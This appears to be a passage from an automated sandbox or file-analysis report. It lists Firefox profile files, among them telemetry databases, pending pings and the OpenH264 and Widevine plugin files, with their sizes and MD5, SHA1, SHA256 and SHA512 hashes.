MD595f90710229679b5466a0cafa0c4d5cb
SHA1fec58c1200bb5fcf222b5a0f5006e42f0126a7e0
SHA2560154405596ebeed6b3e716889b6f3acf2e00446d1e5ff56c24b1c9a0a84bc0b4
SHA512001618a478e2a0f59d83ec977b7c06da3d081f85511560e44845fc6c7b3746c9088e464f1f7bf27f940921e531f13f7c8e6b1ced486153fa143c776b6dfe6e85
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\AlternateServices.bin
Filesize17KB
MD50e049d25d3262a941f477eac8ab06353
SHA19770af23b79fc3715b27e12a1d063b30f04a703e
SHA2562d3c6ce6120af23ef3156a10450da41fe8a66fc7f53aa144ba94ee715e6afcc5
SHA5121fee1879f5adb1f61454d67abe3586a6af019441f140fb73f3472c5a8d9d6dadd9398e47fb8208a79057cea01ebf44a86d6bba54b62dd1eb04974f3fffce56d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\db\data.safe.tmp
Filesize22KB
MD5023b03135307fb0692d8ba4ccde16595
SHA1ac9b8bacd0357cced991b4b138874b704b05a032
SHA25660a532445a5198b5b5b67f35209c16572d1673547c434951851733baa6e79751
SHA512aca90a35e600deab24c6ddcb85aaf4a03cd4aac48216228cab41aeac24b6387aa1a7c0c8db484ad733a79c6180681650eab94b1197a5779c7c864bdbfbb22baf
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\db\data.safe.tmp
Filesize22KB
MD5260a3c12be520b19a692b97520f98bd8
SHA162eaa948615a24d0cc0b2e883a37fea2684fda08
SHA256c5f2a6eea68ef91f70612895172aa2758f588475a5698817b991f7b35254a9f9
SHA5123e7040f14cf4c362294ab16a99e24e7579cdb0735954c45f10aaa8dbf15eb1d7e8467ab062e93379eb689301b344b0e4937b7d00d92f236983e3ec1ee58ea701
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\db\data.safe.tmp
Filesize22KB
MD5fff33e2edce61b9429b7721b1bee552f
SHA1c37a8a2f3c034574777530a2d61a0ac58a92a782
SHA25659826db710c210211b23faf603f76c7df74199cabd328790354e08293ccb7be5
SHA51261f0077c4251cd6bb27e4f471b8d245c74b52459aeb3e0b3680bda318fbbe76b55ac2f219a6a2b523f963d6f53e83e38705229c5b0bfa6e0d42f71bc45ea0258
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\db\data.safe.tmp
Filesize33KB
MD5aa37792b242223085cdbe6f3c90a5052
SHA1569dbfcb7a14aad8b193d6f5bbb52b1f62a1dc31
SHA2568e8f8c808b2c63a6fe067c13208d060d2c0360bbf1a5f7956200f25f36e25690
SHA512fd472cbc09eb8c78d4a9bade0c866013af39f75aed525b68eecebb8818afb3e902194bb1ef57af1e58f7d96cb41fbb54d94080eb7af1892572717c4c0f0f0ab2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\pending_pings\4e38c88c-a7fd-4d7e-a07a-86c8a4c92b9d
Filesize659B
MD526be90c0c21281b91b495e8094792a11
SHA1c34ebfba2fee518a39f9a42a64eac48445c9c17e
SHA256a9c095d7325d850565909bd97b905efe8bb538b6c1cb5c98f877a8afc614e1dd
SHA5122de154db66bd37b482b5cc186b4d7fb0de3c71e70a496d3dc963fc3da978dfe26f05d1ee5520a5abaf6317a8c6553b0f8e3f7f757bfe57b3a2ee9f9a81c8265b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\datareporting\glean\pending_pings\af8bd63b-7b8f-4150-ab11-9b8186372d4e
Filesize982B
MD590b3d0c63131cd4f80675cfc9f9c3d65
SHA1506bc7c6bbab2a25bfd049b0f7ecb36ef9dcda52
SHA256b49ca2a107db6e65ba66e389973c784772f02290220616e733edb3a77bf4b1b4
SHA512e8fa27dba7d5e612e7d0286c66459de310fae374fa9ed92198c90bc63c1dc168d533405f8c34e2e35cf95692101275ff0a7912554a8c50184ed713236977cfae
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3ewdtpo.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
9KB
MD520ac0c8340ff3e399332d5d25ae1e9dd
SHA179e61f88c478cf84a70bade3b8d9fbb0f793e38d
SHA2562ce04b5fe42ff4cde1f3447e5853174e6f141de2d6961b51d3a88ba229e16784
SHA5125ee0d5633b2c2aa1d0f79dad02f9c680ce2ce3c84f2d16364c2eb2f54fd0663740f1d293b76d3631a9b2937795c2ecf43482ee608ede800b3efae605bd08c61d
-
Filesize
10KB
MD57c8c33922e1877f02fd57d335fb1741c
SHA16b0384412b1e8958e935cb16fc4db1d9df6867a7
SHA256f7c385afe654e806e4c3061856970c74d96a59f91e28b40516408688e708986f
SHA512cb326701ed58821abb25fa3b1de618af27bfcc015a0bccd6fd2c5aa39bebad7e16fc81be69e122cb5069b1626b2bcaae4a36709c19d8c58014d4a3ec72b479fb